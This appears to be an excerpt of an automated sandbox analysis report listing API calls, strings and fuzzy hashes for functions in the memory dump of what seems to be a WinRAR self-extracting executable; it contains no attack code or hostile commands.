Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction ID: 337b9792772e0e551df65ab4c2e57439f18bec2fa64a0a8497d65474c3bd4e08
Opcode Fuzzy Hash: eedfc97f7024c66fbeb39a7219499b253e22696fd1fdab2c5f769bf1fd383016
Instruction Fuzzy Hash: 0C310621B1AAC281EE11EF46A81057663B4FF48BA2F195535DF9DCBB80DF3CE0918720

Function 00007FF6CCCB1604 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 43libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(?,?,?,00007FF6CCCB1573,?,?,?,00007FF6CCCB192A), ref: 00007FF6CCCB162B
GetProcAddress.KERNEL32(?,?,?,00007FF6CCCB1573,?,?,?,00007FF6CCCB192A), ref: 00007FF6CCCB1648
GetProcAddress.KERNEL32(?,?,?,00007FF6CCCB1573,?,?,?,00007FF6CCCB192A), ref: 00007FF6CCCB1664

Strings

KERNEL32.DLL, xrefs: 00007FF6CCCB1624
ReleaseSRWLockExclusive, xrefs: 00007FF6CCCB1653
AcquireSRWLockExclusive, xrefs: 00007FF6CCCB163E

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AddressProc$HandleModule
String ID: AcquireSRWLockExclusive$KERNEL32.DLL$ReleaseSRWLockExclusive
API String ID: 667068680-1718035505
Opcode ID: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction ID: 77d366e4172dc98844d07045e411d1c6991861b50a905868e65c67897f098e40
Opcode Fuzzy Hash: 4fe35f58cd4175722fa2f4edd42b7d77b08fa8d78ae8e9bf73ccac7c2071e7f8
Instruction Fuzzy Hash: 1A116D20F1ABC381FE649F84B9A027523B5EF19796F4C4439CB9DC6394EE3CE4858600

Function 00007FF6CCC9ED24 Relevance: 9.1, APIs: 6, Instructions: 120timeCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF6CCC951A4: GetVersionExW.KERNEL32 ref: 00007FF6CCC951D5

FileTimeToLocalFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CCC85AB4), ref: 00007FF6CCC9ED8C
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CCC85AB4), ref: 00007FF6CCC9ED98
SystemTimeToTzSpecificLocalTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CCC85AB4), ref: 00007FF6CCC9EDA8
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CCC85AB4), ref: 00007FF6CCC9EDB6
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CCC85AB4), ref: 00007FF6CCC9EDC4
FileTimeToSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000001,00007FF6CCC85AB4), ref: 00007FF6CCC9EE05

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction ID: 559723e0631da55f7661152abc0d701e8c853d67c03f5a5d8f1a22f05f06361a
Opcode Fuzzy Hash: 197518eb8103cda2bd6b54f1f5e99fa721289ee203340eaf45d2c62117a67569
Instruction Fuzzy Hash: 985169B2B106918BEB14CFA9D4441AC77B1FB48B99B60403ADF4DA7B58DF38E556CB00

Function 00007FF6CCC9F010 Relevance: 9.1, APIs: 6, Instructions: 80timeCOMMON

Download Yara Rule

APIs

SystemTimeToFileTime.KERNEL32 ref: 00007FF6CCC9F074

Part of subcall function 00007FF6CCC951A4: GetVersionExW.KERNEL32 ref: 00007FF6CCC951D5

LocalFileTimeToFileTime.KERNEL32 ref: 00007FF6CCC9F096
FileTimeToSystemTime.KERNEL32 ref: 00007FF6CCC9F0A2
TzSpecificLocalTimeToSystemTime.KERNEL32 ref: 00007FF6CCC9F0B2
SystemTimeToFileTime.KERNEL32 ref: 00007FF6CCC9F0C0
SystemTimeToFileTime.KERNEL32 ref: 00007FF6CCC9F0CE

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Time$File$System$Local$SpecificVersion
String ID:
API String ID: 2092733347-0
Opcode ID: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction ID: adc7d3b3c79b7ff34563ab1ae2495e0bd2193e7d97581f92e2a0fa56b747f020
Opcode Fuzzy Hash: 93bf5fe4be91675a5f4cba4a2df0f2c5ed0bd126a165fd4d88c3e7d5e64543a6
Instruction Fuzzy Hash: 32312662B10A918AEB04DFB5E8901AD7770FB08759B54502AEF4EE7A58EF38D895C700

Function 00007FF6CCC97918 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 233COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC97C8C

Strings

rar, xrefs: 00007FF6CCC97A9B, 00007FF6CCC97AAA, 00007FF6CCC97B67, 00007FF6CCC97B7C
sfx, xrefs: 00007FF6CCC979F3, 00007FF6CCC97A02
.rar, xrefs: 00007FF6CCC97969, 00007FF6CCC97978
exe, xrefs: 00007FF6CCC979AF, 00007FF6CCC979BE

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo_noreturn
String ID: .rar$exe$rar$sfx
API String ID: 3668304517-630704357
Opcode ID: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
Instruction ID: 832a67db186f92229848025779345c3baa89319d7854d65e85f50a849de49a85
Opcode Fuzzy Hash: ded382a5f33e5d00d019a19aa0952dad5d31072c5da8fffb523e0446b7f74fbf
Instruction Fuzzy Hash: 3CA1C122E19A8680EB009F25E8952BD2371BF51B9EF501231DF9D876E9DF3CE5A1C340

Function 00007FF6CCCB5CE8 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 191COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF6CCCB5D58

Part of subcall function 00007FF6CCCB5210: abort.LIBCMT ref: 00007FF6CCCB5223

_CallSETranslator.LIBVCRUNTIME ref: 00007FF6CCCB5DA3
abort.LIBCMT ref: 00007FF6CCCB5FD1

Strings

MOC, xrefs: 00007FF6CCCB5D6C
RCC, xrefs: 00007FF6CCCB5D74

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: abort$CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 2889003569-2084237596
Opcode ID: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction ID: 0369451bae0cd41b6fc4c4932dd4a3ee11bf74f6e12826a959873626570c68aa
Opcode Fuzzy Hash: 0f4c2d06ef2d655583c55900dbb020dcf620b12558a4295111afe460be181df6
Instruction Fuzzy Hash: 4F916C73A08BD18AE711CFA5E4902AD7BB0F744789F14412AEB8D97B55DF38D195CB00

Function 00007FF6CCCB4F80 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 144COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF6CCCB4FAB
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF6CCCB5040
RtlUnwindEx.KERNEL32(?,?,?,?,?,?,?,00007FF6CCCB2F5E), ref: 00007FF6CCCB508F

Strings

f, xrefs: 00007FF6CCCB4FBE
csm, xrefs: 00007FF6CCCB5026

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm$f
API String ID: 2395640692-629598281
Opcode ID: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction ID: 6ffc1777d1404951a21c2dbfa3e33bd2766058ce9a15d8825d6320895bac4a42
Opcode Fuzzy Hash: a7c39da158025e753bf36dfb1e051fd0b17def11f5f8def40396cbfe1c046983
Instruction Fuzzy Hash: 2751C332B1968286EB54DF55E464A2937B5FB40B8AF518030DF9EC7788DF78E842C740

Function 00007FF6CCC8CEE0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 139COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF6CCC8D03D
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8D0D1
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC8D0D7

Part of subcall function 00007FF6CCC8DE04: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,00007FF6CCC8CF4B), ref: 00007FF6CCC8DE27
Part of subcall function 00007FF6CCC8DE04: GetLastError.KERNEL32 ref: 00007FF6CCC8DE88
Part of subcall function 00007FF6CCC8DE04: CloseHandle.KERNEL32 ref: 00007FF6CCC8DE9B

Strings

SeSecurityPrivilege, xrefs: 00007FF6CCC8CF3F
SeRestorePrivilege, xrefs: 00007FF6CCC8CF5E

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ErrorLast_invalid_parameter_noinfo_noreturn$CloseCurrentHandleProcess
String ID: SeRestorePrivilege$SeSecurityPrivilege
API String ID: 2102711378-639343689
Opcode ID: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
Instruction ID: 9e793ae6be71313bc1635a0c6fc13fcd3bcc8cb10920c2ca223368c3a3dfd0d3
Opcode Fuzzy Hash: cc2cdb65981a4fcc868e5d913d4f06653a23f25da57a99a038b17aaaeb8469e6
Instruction Fuzzy Hash: 2451B062F186C285FB10DFA4D8916BE23B1AF957A6F000136DF9D97696DF3CA486C340

Function 00007FF6CCCA7B28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

ShowWindow.USER32 ref: 00007FF6CCCA7B6F
GetWindowRect.USER32 ref: 00007FF6CCCA7BC0
ShowWindow.USER32 ref: 00007FF6CCCA7C96
ShowWindow.USER32 ref: 00007FF6CCCA7CC3

Strings

RarHtmlClassName, xrefs: 00007FF6CCCA7C4B

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: Window$Show$Rect
String ID: RarHtmlClassName
API String ID: 2396740005-1658105358
Opcode ID: 953af82ac97f53ff3664e5cae13e18f5e39b1284c961c4c0c6c177a49c08ee6a
Instruction ID: d0a4ab8ae4b38baadd2360c98763556e4f634ad9c9c32f1f64aed04d4da36019
Opcode Fuzzy Hash: 953af82ac97f53ff3664e5cae13e18f5e39b1284c961c4c0c6c177a49c08ee6a
Instruction Fuzzy Hash: 49515E22A09BC28AEB249F25E45977A67B1FB85B82F044439DBCE87B55DF3CE4458700

Function 00007FF6CCCAFD0C Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 76COMMON

Download Yara Rule

APIs

SetEnvironmentVariableW.KERNEL32 ref: 00007FF6CCCAFD43
SetEnvironmentVariableW.KERNEL32 ref: 00007FF6CCCAFDBC
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCCAFE1B

Strings

sfxcmd, xrefs: 00007FF6CCCAFD3C
sfxpar, xrefs: 00007FF6CCCAFDB5

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: EnvironmentVariable$_invalid_parameter_noinfo_noreturn
String ID: sfxcmd$sfxpar
API String ID: 3540648995-3493335439
Opcode ID: 42a5c16ff962b42e9c466757ddc2add4312beed441a9accfeec164922430c806
Instruction ID: 5b359176716484452f1cc2950d24272cae4ee6a4991e4aa6ddb21337a4a46fa3
Opcode Fuzzy Hash: 42a5c16ff962b42e9c466757ddc2add4312beed441a9accfeec164922430c806
Instruction Fuzzy Hash: 63317E32E14A8684FB04DF65E8981AD3371FB98B9AF141131DF9D97BA9DE38D082C354

Function 00007FF6CCCAFED4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 52COMMON

Download Yara Rule

Strings

REPLACEFILEDLG, xrefs: 00007FF6CCCAFF34, 00007FF6CCCAFF99
RENAMEDLG, xrefs: 00007FF6CCCAFF60

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID:
String ID: RENAMEDLG$REPLACEFILEDLG
API String ID: 0-56093855
Opcode ID: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction ID: 2cb04b70070ea7e69730fa283032f9ece95a5c9bfda71b11b686477371b4a39a
Opcode Fuzzy Hash: 98f895654b64cd1d2f90e97d30244ed9b67d31cc2014a88c355cd353264df31a
Instruction Fuzzy Hash: 2821E621909BCB81FB108F59B84917463B0EB8AB8AF14043ADBCDC7760DE3CE5958390

Function 00007FF6CCCBBFB0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF6CCCBBFD0
GetProcAddress.KERNEL32 ref: 00007FF6CCCBBFE6
FreeLibrary.KERNEL32 ref: 00007FF6CCCBC00B

Strings

mscoree.dll, xrefs: 00007FF6CCCBBFC7
CorExitProcess, xrefs: 00007FF6CCCBBFDF

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction ID: 6c854b0859df694b4cf6d56c493e1cd44f39df68dbab97fb677428462882a8e1
Opcode Fuzzy Hash: 42a4ca90c7c49dddb16080121233970ff8583544d2054868cb5f0899d871e2db
Instruction Fuzzy Hash: A4F0FF61A19A8281EF449F55F49427A63B0AF88796F445035EB8F86665DE3CE4858700

Function 00007FF6CCCC45C0 Relevance: 7.7, APIs: 5, Instructions: 203COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF6CCCC4605

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: _invalid_parameter_noinfo
String ID:
API String ID: 3215553584-0
Opcode ID: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction ID: 29c4502084234de4186b2b43764728de17108a2c22be513d2ba02a7abc039e5c
Opcode Fuzzy Hash: cf462e6f26ae3af6f96c078c51b53c82231ed120809331cf2f591469c69a5a17
Instruction Fuzzy Hash: 7281DE62E1869289F710EF6598806BD26B0BB45B8AF008135CF8ED3E99DF3CE452C700

Function 00007FF6CCC93AF8 Relevance: 7.7, APIs: 5, Instructions: 164filetimeCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 00007FF6CCC93BBB
CreateFileW.KERNEL32 ref: 00007FF6CCC93C24
SetFileTime.KERNEL32 ref: 00007FF6CCC93CEC
CloseHandle.KERNEL32 ref: 00007FF6CCC93CF6
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6CCC93D2C

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: File$Create$CloseHandleTime_invalid_parameter_noinfo_noreturn
String ID:
API String ID: 2398171386-0
Opcode ID: 94d33130e0d3e07453908689b86af48371af1e3e167329ed22bda644dbf2c176
Instruction ID: d4e1aed9611ae2df448c741a398f1377f759e016d8eaa5cc90348f1c09ec8e42
Opcode Fuzzy Hash: 94d33130e0d3e07453908689b86af48371af1e3e167329ed22bda644dbf2c176
Instruction Fuzzy Hash: 4A51B122F14A8299FB50DF65E4502BD23B1AB857ADF084635DFAD867D4DF3C94458300

Function 00007FF6CCCC3F34 Relevance: 7.6, APIs: 5, Instructions: 142fileCOMMON

Download Yara Rule

APIs

GetConsoleCP.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,?,00007FF6CCCC4767), ref: 00007FF6CCCC3F91
WideCharToMultiByte.KERNEL32 ref: 00007FF6CCCC406D
WriteFile.KERNEL32 ref: 00007FF6CCCC4093
WriteFile.KERNEL32 ref: 00007FF6CCCC40D2
GetLastError.KERNEL32 ref: 00007FF6CCCC410A

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: FileWrite$ByteCharConsoleErrorLastMultiWide
String ID:
API String ID: 3659116390-0
Opcode ID: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction ID: 587a4f3f6b1eb76fbba51c3148d39bc1fea9392b98ef27b823a35707388b2aff
Opcode Fuzzy Hash: 8f90b3f8899b92826fb288bc35eb601c263b89b4fb676f823db5d062d6f6b41f
Instruction Fuzzy Hash: FB519F32A14A9189E710DF65E8853BD3BB1FB58B99F088135DF8E97A98DF38D146C700

Function 00007FF6CCCB1E00 Relevance: 7.6, APIs: 5, Instructions: 137memoryCOMMON

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6CCC94DF4), ref: 00007FF6CCCB1E87
MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6CCC94DF4), ref: 00007FF6CCCB1F09
SysAllocString.OLEAUT32 ref: 00007FF6CCCB1F16

Memory Dump Source

Source File: 00000002.00000002.2612821668.00007FF6CCC81000.00000020.00000001.01000000.00000007.sdmp, Offset: 00007FF6CCC80000, based on PE: true

Associated: 00000002.00000002.2612766073.00007FF6CCC80000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612922075.00007FF6CCCC8000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCDB000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2612972974.00007FF6CCCE4000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEA000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000002.00000002.2613105812.00007FF6CCCEE000.00000002.00000001.01000000.00000007.sdmpDownload File

Similarity

API ID: ByteCharMultiWide$AllocString
String ID:
API String ID: 262959230-0
Opcode ID: 7e9601d2247a13adf5892490d0984888a090eff7ba9d3fa4ff308a8b8e371313
Instruction ID: 899e0177ca90a954b820485d690ccffe5859a9ce1efec08aa4e161acc7fb2e8a
